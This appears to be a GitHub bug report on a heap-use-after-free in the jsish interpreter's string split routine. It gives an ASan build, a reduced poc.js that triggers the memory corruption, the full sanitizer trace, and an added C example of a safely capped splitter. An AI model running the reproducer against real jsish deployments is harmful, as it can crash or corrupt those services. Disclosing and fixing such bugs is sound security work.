
heap-use-after-free ./jsish/src/jsiUtils.c:2060:17 in SplitChar #101

Open
Ye0nny opened this issue Jan 20, 2024 · 0 comments

Comments


Ye0nny commented Jan 20, 2024

Jsish revision

Commit: 42c694c
Version: v3.5.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps

```sh
export JSI__SANITIZE=1
make
```

Test case

testcase:

```js
try { 
	var a = " a aaaa ". repeat ( 1 + 100 << 16 ). trim ( ). split ( ) ;
	JSON. parse ( parse ( JSON. stringify ) ) ; 
} 
catch ( a ) { } 
JSON. stringify ( + a ) ;
```

poc.js (reduced):

```js
// poc.js
try {
	var a = " a aaaa ". repeat ( 1 + 100 << 16 ). trim ( ). split ( ) ;
}
catch ( a ) { }
```
Execution steps & Output
$ ./jsish/jsish poc.js
max alloc exceeded 104857600Jsi_DSSetLength src/jsiDString.c:196
max alloc exceeded 211812340Jsi_DSSetLength src/jsiDString.c:196
=================================================================
==3962909==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f069b6bb7e8 at pc 0x000000552d3a bp 0x7fff816e51c0 sp 0x7fff816e51b8
WRITE of size 8 at 0x7f069b6bb7e8 thread T0
    #0 0x552d39 in SplitChar ./jsish/src/jsiUtils.c:2060:17
    #1 0x552d39 in Jsi_SplitStr ./jsish/src/jsiUtils.c:2315:16
    #2 0x579c25 in StringSplitCmd ./jsish/src/jsiString.c:78:9
    #3 0x5592da in jsi_FuncCallSub ./jsish/src/jsiProto.c:244:22
    #4 0x78812a in jsiFunctionSubCall ./jsish/src/jsiEval.c:796:10
    #5 0x766920 in jsiEvalFunction ./jsish/src/jsiEval.c:837:17
    #6 0x766920 in jsiEvalCodeSub ./jsish/src/jsiEval.c:1269:25
    #7 0x780f26 in jsi_evalcode ./jsish/src/jsiEval.c:2227:10
    #8 0x78396f in jsi_evalStrFile ./jsish/src/jsiEval.c
    #9 0x74a726 in Jsi_EvalFile ./jsish/src/jsiEval.c:2729:12
    #10 0x5176d5 in Jsi_Main ./jsish/src/jsiInterp.c:936:18
    #11 0xdefaa3 in jsi_main ./jsish/src/main.c:47:26
    #12 0x7f06aa752082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16
    #13 0x42c9bd in _start (./jsish/jsish+0x42c9bd)

0x7f069b6bb7e8 is located 5885928 bytes inside of 100000000-byte region [0x7f069b11e800,0x7f06a107c900)
freed by thread T0 here:
    #0 0x4a4e7d in free (./jsish/jsish+0x4a4e7d)
    #1 0x6047d4 in Jsi_ObjFree ./jsish/src/jsiObj.c:326:17

previously allocated by thread T0 here:
    #0 0x4a5419 in realloc (./jsish/jsish+0x4a5419)
    #1 0x535f91 in Jsi_Realloc ./jsish/src/jsiUtils.c:47:15

SUMMARY: AddressSanitizer: heap-use-after-free ./jsish/src/jsiUtils.c:2060:17 in SplitChar
Shadow bytes around the buggy address:
  0x0fe1536cf6a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf6b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf6c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf6d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf6e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0fe1536cf6f0: fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd
  0x0fe1536cf700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf730: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe1536cf740: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3962909==ABORTING

Credits: @Ye0nny, @EJueon of the seclab-yonsei.
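The sanitizer report above shows the shape of the defect from the defender's side: the splitter keeps writing into an object array after an allocation-limit error ("max alloc exceeded" in Jsi_DSSetLength) has already led to that array being freed by Jsi_ObjFree. The following is an added C example, not jsish's code, of a capped splitter whose limit-error path is reported to the caller and handled once, so no write can land on a freed region. The names (`split_capped`, `Pieces`, `MAX_ALLOC`, `split_huge_is_rejected`) and the 64 KiB cap are constructed for this illustration and do not correspond to anything in jsish.

```c
/* Added example (not jsish code): a string splitter with an allocation cap whose
 * error path is propagated to the caller instead of freeing the buffer under it.
 * All names and the cap value are hypothetical / constructed for this example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ALLOC (64 * 1024)   /* constructed cap, analogous to an interpreter's "max alloc" */

typedef struct {
    char **items;
    size_t count;
    size_t cap;
} Pieces;

/* Grow the item array. Returns 0 on success, -1 if the cap would be exceeded or
 * realloc fails. On failure the existing buffer is left intact: the caller owns
 * it. Freeing it here while the caller still holds a pointer and keeps looping is
 * exactly the pattern that produces a heap-use-after-free in the caller. */
static int pieces_grow(Pieces *p) {
    size_t newcap = p->cap ? p->cap * 2 : 8;
    if (newcap * sizeof(char *) > MAX_ALLOC) return -1;
    char **n = realloc(p->items, newcap * sizeof(char *));
    if (!n) return -1;
    p->items = n;
    p->cap = newcap;
    return 0;
}

/* Release every piece and the array, and zero the struct so no stale pointer survives. */
void pieces_free(Pieces *p) {
    for (size_t i = 0; i < p->count; i++) free(p->items[i]);
    free(p->items);
    p->items = NULL;
    p->count = p->cap = 0;
}

/* Split s on delim into p. Returns 0 on success, -1 on an allocation-limit or
 * out-of-memory failure; on failure p is released and zeroed and the loop stops
 * immediately, so nothing is ever written through a freed pointer. */
int split_capped(const char *s, char delim, Pieces *p) {
    memset(p, 0, sizeof *p);
    if (delim == '\0') return -1;          /* refuse a delimiter that strchr would match at the terminator */
    const char *start = s;
    for (;;) {
        const char *end = strchr(start, delim);
        size_t len = end ? (size_t)(end - start) : strlen(start);
        if (p->count == p->cap && pieces_grow(p) != 0) {
            pieces_free(p);                /* handle the error once, here, then stop */
            return -1;
        }
        char *piece = malloc(len + 1);
        if (!piece) { pieces_free(p); return -1; }
        memcpy(piece, start, len);
        piece[len] = '\0';
        p->items[p->count++] = piece;
        if (!end) break;
        start = end + 1;
    }
    return 0;
}

/* Constructed stress input: ndelims delimiters in a row, enough to exceed
 * MAX_ALLOC. Returns 1 if the split was rejected cleanly (error code returned,
 * struct zeroed), 0 otherwise, -1 if the input itself could not be allocated. */
int split_huge_is_rejected(size_t ndelims) {
    char *big = malloc(ndelims + 1);
    if (!big) return -1;
    memset(big, ' ', ndelims);
    big[ndelims] = '\0';
    Pieces p;
    int rc = split_capped(big, ' ', &p);
    free(big);
    return (rc == -1 && p.items == NULL && p.count == 0) ? 1 : 0;
}

int main(void) {
    Pieces p;
    if (split_capped("a b c", ' ', &p) == 0) {
        printf("%zu pieces, second is \"%s\"\n", p.count, p.items[1]);
        pieces_free(&p);
    }
    printf("oversized input rejected cleanly: %d\n", split_huge_is_rejected(100000));
    return 0;
}
```

Compiling this with `-fsanitize=address` and running it stays clean on both the small and the oversized input; the point is that the only place the array is freed is the single error exit that also ends the loop, which is the property to check for in any splitter or buffer-growing routine that sits behind an allocation limit.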
